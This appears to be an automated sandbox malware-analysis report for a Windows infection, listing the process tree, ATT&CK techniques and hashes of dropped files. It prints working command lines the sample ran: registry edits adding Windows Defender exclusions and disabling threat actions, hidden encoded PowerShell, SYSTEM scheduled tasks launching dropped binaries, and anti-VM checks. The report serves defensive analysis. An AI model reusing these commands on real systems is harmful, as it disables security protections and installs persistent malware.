C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZmzskowerwXEonlG /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZmzskowerwXEonlG /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gxZtArRKB" /SC once /ST 03:24:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gxZtArRKB"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gxZtArRKB"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WKALCIrwIEiqhKBsn" /SC once /ST 04:40:22 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\UlrnSVu.exe\" y7 /zIajdidIU 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "WKALCIrwIEiqhKBsn"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2320 -s 5922⤵
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exeC:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exeC:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe1⤵
- Executes dropped EXE
-
C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\UlrnSVu.exeC:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\UlrnSVu.exe y7 /zIajdidIU 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bqGGCwwWIommTRgeuN"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JipyTrDkU\CPhJaG.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jiLwFdOzPPQiWLm" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jiLwFdOzPPQiWLm2" /F /xml "C:\Program Files (x86)\JipyTrDkU\dKSmcil.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "jiLwFdOzPPQiWLm"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jiLwFdOzPPQiWLm"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EyAjTIEydjCaoB" /F /xml "C:\Program Files (x86)\tegRANPZONsU2\RXaqAVj.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nwujZhVsLEYxr2" /F /xml "C:\ProgramData\fcblnlcRRSrBhAVB\JZjJdJS.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "njgsfWmNUCIAXOmvm2" /F /xml "C:\Program Files (x86)\krdeMCnRKomDOvwVunR\YcIorhS.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZXdYLGWImophNcyfuyr2" /F /xml "C:\Program Files (x86)\YLgKyOFzWxOqC\fgUFbrM.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "QdCYtDviHOrgqJLgZ" /SC once /ST 01:23:23 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZmzskowerwXEonlG\atKfYVKf\VPhxhWN.dll\",#1 /VdidHy 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "QdCYtDviHOrgqJLgZ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "WKALCIrwIEiqhKBsn"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4344 -s 19802⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2320 -ip 23201⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZmzskowerwXEonlG\atKfYVKf\VPhxhWN.dll",#1 /VdidHy 3851181⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZmzskowerwXEonlG\atKfYVKf\VPhxhWN.dll",#1 /VdidHy 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "QdCYtDviHOrgqJLgZ"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 3448 -ip 34481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4344 -ip 43441⤵
-
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exeC:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exeC:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
1Windows Service
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Abuse Elevation Control Mechanism
1Bypass User Account Control
1Scheduled Task/Job
1Defense Evasion
Modify Registry
6Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
3Disable or Modify Tools
3Virtualization/Sandbox Evasion
2Pre-OS Boot
1Bootkit
1Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\$RECYCLE.BIN\S-1-5-18\desktop.iniFilesize
129B
MD5a526b9e7c716b3489d8cc062fbce4005
SHA12df502a944ff721241be20a9e449d2acd07e0312
SHA256e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88
-
C:\Program Files (x86)\JipyTrDkU\dKSmcil.xmlFilesize
2KB
MD535508ba3ecf0ee54a9f367000229243c
SHA1f04bcda5ba4e7eaa5938a346579816bda4149e50
SHA25630b2325bd9355ed221d451c94895595d59ead23b9d534d64353a06531cdcd9ec
SHA51233e2327d768250b93bd94f516be6b05805176605027f3263ab11be070331ebab5a53b742f4c9a75b6aa556513aebc2cb8425ca218eb571087eb79bb3ea9a0296
-
C:\Program Files (x86)\YLgKyOFzWxOqC\fgUFbrM.xmlFilesize
2KB
MD537bd79d0ec1eb1b4c26e72f099af5dd0
SHA157cda22dd18a56a4314a9ad98f6296edc8564b5d
SHA2569f6b6d4b949b76231f702d07a79724bdf9b5783a044769317419de711c89ad68
SHA5124e02248b20a06bfd61208506e7495e3d617d58c480c198107cc8a348b9a0b2a8ee636fd8b30d329e98ca8005d0b29adaba8be4714679a5462d2c0c38cb79fa55
-
C:\Program Files (x86)\krdeMCnRKomDOvwVunR\YcIorhS.xmlFilesize
2KB
MD51dd12c8533d66b967a9d6d8ce4efd124
SHA105c3235379cbac4e2f265b499bd2b265e52da2f7
SHA256cabf9b58cddbef92ac19b85e55c165425057915eedce72be6606cd2c31dda537
SHA512fd34fa36b2d7798c5855e5141d810a82974c563eceb795f2de33a6d7ae6c4d1d880db0a407bc99988945ca9a123ffc113ef369b50cce148b1fff3b3c4187de68
-
C:\Program Files (x86)\tegRANPZONsU2\RXaqAVj.xmlFilesize
2KB
MD551667c28801a8736775eb0de69bd7c08
SHA17003221812a4a12b59613736fbe20533734f565d
SHA2565aeec09a61c4fdc66cfc74d2bb7c01c9e944b884be447457d19b0410a22bae52
SHA51262f24c65b3dbecc4747dacadf04c48cc467b966283a9e24a6dbf0886eb4aabb791d97744a605755a2b0e00ebb5c96a20434aa03a03beee9299b984ae4282f13b
-
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpiFilesize
2.5MB
MD505c1d10a6f198f9287bed4bffa868c01
SHA101bd2f6d3b2e76f84e13ca676fa2b95706ed0c1e
SHA25603332d425c46bdab259f335d3603b1af9460c6b70bb3f1b46e9370dd3808207c
SHA51259638fc8a47ba5c5da84dd9839bb41b5e2fc52e6fc41978d63366046f4cbc423bdf2c19924ad49feddbec76a8b5033f73cc915ff32e5ca0374a6e544204369ce
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.jsonFilesize
187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.jsonFilesize
136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.jsonFilesize
150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
11KB
MD5d1cf6b2edd1ea68a74065ca50127d035
SHA13ca4f51d1f13a88e858f7fa6645194dbd861616a
SHA256fbe6da9b7c5aefcebb484f538064c87b5835cae8c224659dd45a7ba9b518c70b
SHA512c3c72f0d9e1cd42c31af9591f2f1031719d8d14cd070317fa6385b91b7dcd200b3df5231b4375a21aeb8526873d32c9748c45ff2673cc39626eaeca5e5a6dfcf
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesFilesize
36KB
MD56358f0f156110d5bd18057cf47937488
SHA1444ee93f98e31d848edeb254cdd592376d0cf361
SHA25601b3cf833382a7bb9e75259bc764202c7158f1af698ab3a3539a4e9a4e9833b5
SHA51283e6f38c4fa1148a522504f565354f130c845888bb3360dee6644e1a065815f439364cf5ddb8839f893d83f2eeab998e78abf58a61eb9bddc47f876a449afeb5
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD5def65711d78669d7f8e69313be4acf2e
SHA16522ebf1de09eeb981e270bd95114bc69a49cda6
SHA256aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c
SHA51205b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.jsonFilesize
151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD559d97011e091004eaffb9816aa0b9abd
SHA11602a56b01dd4b7c577ca27d3117e4bcc1aa657b
SHA25618f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d
SHA512d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
11KB
MD52a57724a52f5aab1215249ab8b099b05
SHA14656ccb6098442b67d46c3d5f4738a510d32aa09
SHA2568f7fc673d563ca686bc549aff4b89d18173a170b052d4ac884b2be6aa68e9084
SHA51274dc888f2cf3b4797e4625d16d65af68f40f371f1ec1070d22e0c1f977eca2f110b1150f96860260cf608317eefed324cf35bda4a187fa19905006a69cac0957
-
C:\Users\Admin\AppData\Local\Packages\favicon.pngFilesize
5.9MB
MD51603865df23efcd1dc421a48f090b2d5
SHA129c835478c413295787656da1201a3bd08582267
SHA256fc48da13fe7501b9a08daced7a7fadc6914a36c6c12461a73d2170d748be5712
SHA512e9bca0319aa1cacdd86a3b5b5904cd508a245e64399acf335299b298feec130985b68ad3456b177aa466284c6239e952aa15ed0e6545ae6ad72848d3ea6405b1
-
C:\Users\Admin\AppData\Local\Temp\[email protected]Filesize
656B
MD5184a117024f3789681894c67b36ce990
SHA1c5b687db3b27ef04ad2b2cbc9f4e523cb7f6ba7e
SHA256b10d5fef165fc89e61cd16e02eac1b90b8f94ef95218bdd4b678cd0d5c8a925e
SHA512354d3bbc1329cbbe30d22f0cf95564e44acc68d6fe91e2beb4584a473d320faf4c092de9db7f1f93cf0b235703fc8de913883985c7d5db6b596244771a1edaf7
-
C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.iniFilesize
830B
MD5e6edb41c03bce3f822020878bde4e246
SHA103198ad7bbfbdd50dd66ab4bed13ad230b66e4d9
SHA2569fa80f0889358d9db3d249a2e747e27b7c01c6123b784d94d169c0e54cacf454
SHA5122d71b7d50212f980e82562af95598c430aa0875f7a9d9cc670ba2cb1f63057fb26fd747a99cb4ca08f2355d002daa79bda2236b3ad9e37a3cfef32ae5420e2a1
-
C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exeFilesize
2.1MB
MD5208bd37e8ead92ed1b933239fb3c7079
SHA1941191eed14fce000cfedbae9acfcb8761eb3492
SHA256e1fd277ffc74d67554adce94366e6fa5ebc81f8c4999634bcc3396164ba38494
SHA512a9c3c32573a16b7ca71a12af6e8c8e88502b66bae2465a82dd921fbc6e0c833b9b1c2d436963df189dd9d68568e1be9128826a2e59f1d5fe066b637d2d866715
-
C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exeFilesize
304KB
MD584bf36993bdd61d216e83fe391fcc7fd
SHA1e023212e847a54328aaea05fbe41eb4828855ce6
SHA2568e6d8b5a004c8f21bee1bbe4213c6d78cf80e439b38f587e963e9bb4569aaffa
SHA512bb3241949618ad2d39057e085e150f43b4d41d74efc4658d9c27f8c0ec80420191517a2c0b6b7e225c4e50e02cd031cdfd178e05b9a869847a3c27b210d09caf
-
C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exeFilesize
518KB
MD5c4ffab152141150528716daa608d5b92
SHA1a48d3aecc0e986b6c4369b9d4cfffb08b53aed89
SHA256c28de1802bdbcf51c88cd1a4ac5c1decb0558fa213d83833cf5dbd990b9ae475
SHA512a225e98f2bc27e2add9d34bd850e0e66a27bd1db757c979639a636a6efe412e638025c6e235c36188a24c9af2bde4b17d1dbaa0707dce11411402cd5de8024e9
-
C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exeFilesize
1.2MB
MD50b7e08a8268a6d413a322ff62d389bf9
SHA1e04b849cc01779fe256744ad31562aca833a82c1
SHA256d23a10b3ff0c565ea8ee7f54bcded0582e1e621ebad69d4523d6746f6d8e0e65
SHA5123d226673e30bbbc27e0a5a6c64bf81eca475c697486b20141df7975bef97901d4865b88f41937f5e3dd00b437f24f91493f80cb69aa366b7a49cd17b26197ba4
-
C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exeFilesize
778KB
MD505b11e7b711b4aaa512029ffcb529b5a
SHA1a8074cf8a13f21617632951e008cdfdace73bb83
SHA2562aab2ca39749b21877d1c52526009f9f5d251d934205e9f671a9e84cecd55afa
SHA512dde7b561ffb3b9fe71827be9313cd3b83900c3ce76b053d028e84223fba1b06035437b3860a74de7dc2f5d40f0b90bd7d60139701d752c803eb08f362a5d57ff
-
C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exeFilesize
579KB
MD5a991da123f34074f2ee8ea0d798990f9
SHA13988195503348626e8f9185747a216c8e7839130
SHA256fd42e618223f510d694c5fb2f8ecbc1a88cabf003bcf20da6227da30a1352a0f
SHA5121f958cacb820833ea8b5ac2d9ca7f596625e688f8f6b6e3ab6f27aa3b25b8c9e5b57e1eed532a8d2519da6c1b41492eb8ac930fc25eaf2be2f344c2f32e81a49
-
C:\Users\Admin\AppData\Local\Temp\1000030001\CoMachina.exeFilesize
162B
MD51b7c22a214949975556626d7217e9a39
SHA1d01c97e2944166ed23e47e4a62ff471ab8fa031f
SHA256340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87
SHA512ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5
-
C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exeFilesize
418KB
MD50099a99f5ffb3c3ae78af0084136fab3
SHA10205a065728a9ec1133e8a372b1e3864df776e8c
SHA256919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226
SHA5125ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6
-
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exeFilesize
1.8MB
MD5e92c63ce517395254575c4bc03c28ef6
SHA122270eba625c036ac12599b52d4dd77cdf71ecd7
SHA2566431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73
SHA51231c61d1b7979de22a5b7f4df96b1d1bd7f947dd2254fa5a41b9fdaa22455752bf4fca9c1acec2b0cbfb4942a626d382b4038469eb28af9de3872c6d2cf68549f
-
C:\Users\Admin\AppData\Local\Temp\7zSD4B5.tmp\Install.exeFilesize
6.3MB
MD57d1dd60c4b8fb4167645f7093801b6d9
SHA14ae1feb130e57f803ef00709419e6226b7c0e54d
SHA2561c62508e00e567d8f753734590a0a303acad2877681173cb4eed2e1a8409f3e9
SHA5127904bcaefe3d2f0e643f24a2e1eb6f0079e28d7df15f7be0fcd73ecc76680a9a677fe199d8a4d80d08144adbd4769d2a14eac2f933404aeeec05fe103429e872
-
C:\Users\Admin\AppData\Local\Temp\7zSD997.tmp\Install.exeFilesize
6.6MB
MD50550ef6afda33ea1c1a231b939ca9b07
SHA1f74897166553b218e3a0869502ed036f175be9cd
SHA2568462d8b0433559e9afc2cd5de7bffe38fc6b82e3da9e79bdd33a85ab79fafaeb
SHA512329fa4ba439852740683dfb60070116fc459785d8a936e59aa4e55affe4697d66c5db844d154b30ab41913342fd5d51760f329cf30dc039387d0929026219a2e
-
C:\Users\Admin\AppData\Local\Temp\Tmp7FBF.tmpFilesize
2KB
MD51420d30f964eac2c85b2ccfe968eebce
SHA1bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA5126fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8
-
